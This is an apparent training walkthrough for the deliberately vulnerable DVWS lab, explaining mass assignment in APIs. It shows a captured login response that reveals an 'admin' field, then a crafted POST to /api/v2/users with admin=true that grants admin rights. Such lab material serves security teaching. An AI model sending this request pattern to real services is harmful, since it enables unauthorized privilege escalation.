Mass Assignment
Software frameworks applications are built on sometimes allow developers to automatically bind HTTP request parameters into program code variables or objects to make using that framework easier on developers. This can often lead to mass assignment vulnerabilities. By leveraging this vulnerability, it might be possible to overwrite new variable or objects in program code that was not intended.
It is common for APIs not not validate parameters provided from user input, and bind them into program code variables without validation. Within DVWS, an admin area exists http://dvws.local/admin.html which can only be accessed as an admin privileged user.
It is possible to understand that other parameters exist during creation and authentication of a user exist by studying the /api/v2/login API request.
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: http://dvws.local
Vary: Origin
Access-Control-Allow-Credentials: true
Cache-Control: no-store, no-cache, must-revalidate, private
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZm9vYmFyIiwicGVybWlzc2lvbnMiOlsidXNlcjpyZWFkIiwidXNlcjp3cml0ZSJdLCJpYXQiOjE1OTE0NDgzNzIsImV4cCI6MTU5MTYyMTE3MiwiaXNzIjoiaHR0cHM6Ly9naXRodWIuY29tL3Nub29weXNlY3VyaXR5In0.kNt8Ii58BflkixwYYnZaGEStbMCgB4g6rlbpuOTeJ2s
Content-Type: application/json; charset=utf-8
Content-Length: 445
ETag: W/"1bd-MTCFCIRckdyAF1fzVOMQ7O5tHg4"
Date: Sat, 06 Jun 2020 12:59:32 GMT
Connection: close
{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZm9vYmFyIiwicGVybWlzc2lvbnMiOlsidXNlcjpyZWFkIiwidXNlcjp3cml0ZSJdLCJpYXQiOjE1OTE0NDgzNzIsImV4cCI6MTU5MTYyMTE3MiwiaXNzIjoiaHR0cHM6Ly9naXRodWIuY29tL3Nub29weXNlY3VyaXR5In0.kNt8Ii58BflkixwYYnZaGEStbMCgB4g6rlbpuOTeJ2s","status":200,"result":{"admin":false,"_id":"5edb9333d46c9612a137755c","username":"foobar","password":"$2b$10$b3dqx5BUMHcGUzdmaMFbmemSfOrtqECOErN66YXrV2nM1Re6yqddS","__v":0}}
By looking at the above response, it is seen that a parameter called admin exists which is set to false. A mass assignment vulnerability exists in DVWS where this parameter can be given during account creation to get admin privileges.
POST /api/v2/users HTTP/1.1
Host: dvws.local
Content-Length: 44
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4164.0 Safari/537.36 autochrome/red
Content-Type: application/x-www-form-urlencoded
Origin: http://dvws.local
Referer: http://dvws.local/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
username=foobar2&password=foobar2&admin=true
The admin area can now be accessed.
